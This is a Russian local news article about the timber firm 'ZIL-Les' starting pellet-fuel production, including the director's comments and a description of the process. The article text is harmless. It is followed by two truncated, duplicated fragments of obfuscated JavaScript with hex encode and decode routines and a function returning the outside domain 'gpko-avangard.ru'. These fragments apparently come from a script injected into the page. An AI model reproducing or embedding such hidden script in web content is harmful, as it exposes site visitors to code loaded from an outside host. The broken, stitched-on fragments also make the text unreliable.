Производство: Будут пеллеты и в «ЗИЛ-Лес»

Производство: Будут пеллеты  и в «ЗИЛ-Лес»

Нынешний год для коллектива предприятия, ориентированного на переработку древесины, которое расположено в посёлке Октябрьском, начался, как и у всех производственников, не без проблем, но… с просматриваемой перспективой. На днях мы побывали здесь и узнали, что планируется выпуск нового вида продукции из древесных отходов. Директор предприятия Александр Сушенцов рассказывает:

Сейчас завозим из Москвы оборудование, монтируется линия по производству.
Пеллеты, или топливные гранулы, — нормированные цилиндрические изделия, изготовленные путём прессования высушенной и измельчённой древесины. Если сравнивать их по теплотворной способности с другими видами топлива, то специалисты утверждают, что за счёт высокой плотности и сухости этот показатель сопоставим с каменным углём. Производится биотопливо из опилок и прочих отходов деревообработки с помощью пресса. Пеллеты находят всё большее применение, в частности, в Подмосковье на дачах. В настоящий момент котлы на пеллетах являются достойной альтернативой традиционным отопительным системам. Как минимум, покупка топливных гранул обходится дешевле, чем покупка колотых дров. В целях экономии электроэнергии, руководство «ЗИЛ-Лес» установило такой котёл в имеющейся у предприятия гостинице, его использование оправдывает себя, поскольку раньше только на электроэнергию уходило более 25 тыс. руб.
Ну, а пока в цехе ведётся монтаж оборудования. Здесь будет занято всего два человека, специально обученные люди. Технология следующая: сначала отходы производства от линий сращивания, горбыль в рубительной машине превращаются в щепу. Затем подаются в другую рубительную, где превращаются в более мелкую фракцию. Затем отправляются в накопитель, далее подаются в барабан, где опилки сушатся, и потом в бункер. Проходят ещё несколько операций и идут на гранулирование. Пеллеты фасуют в мешки по 20 кг и реализуют потребителям. Но это все ещё впереди, а пока…
— Пока трудно прогнозировать, какими будут объёмы, — говорит Александр Павлович, — всё будет ясно после того, как окончательно освоим это производство. Планы большие, древесина есть, надеемся эффективно работать и получать прибыль.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «gpko-avangard.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e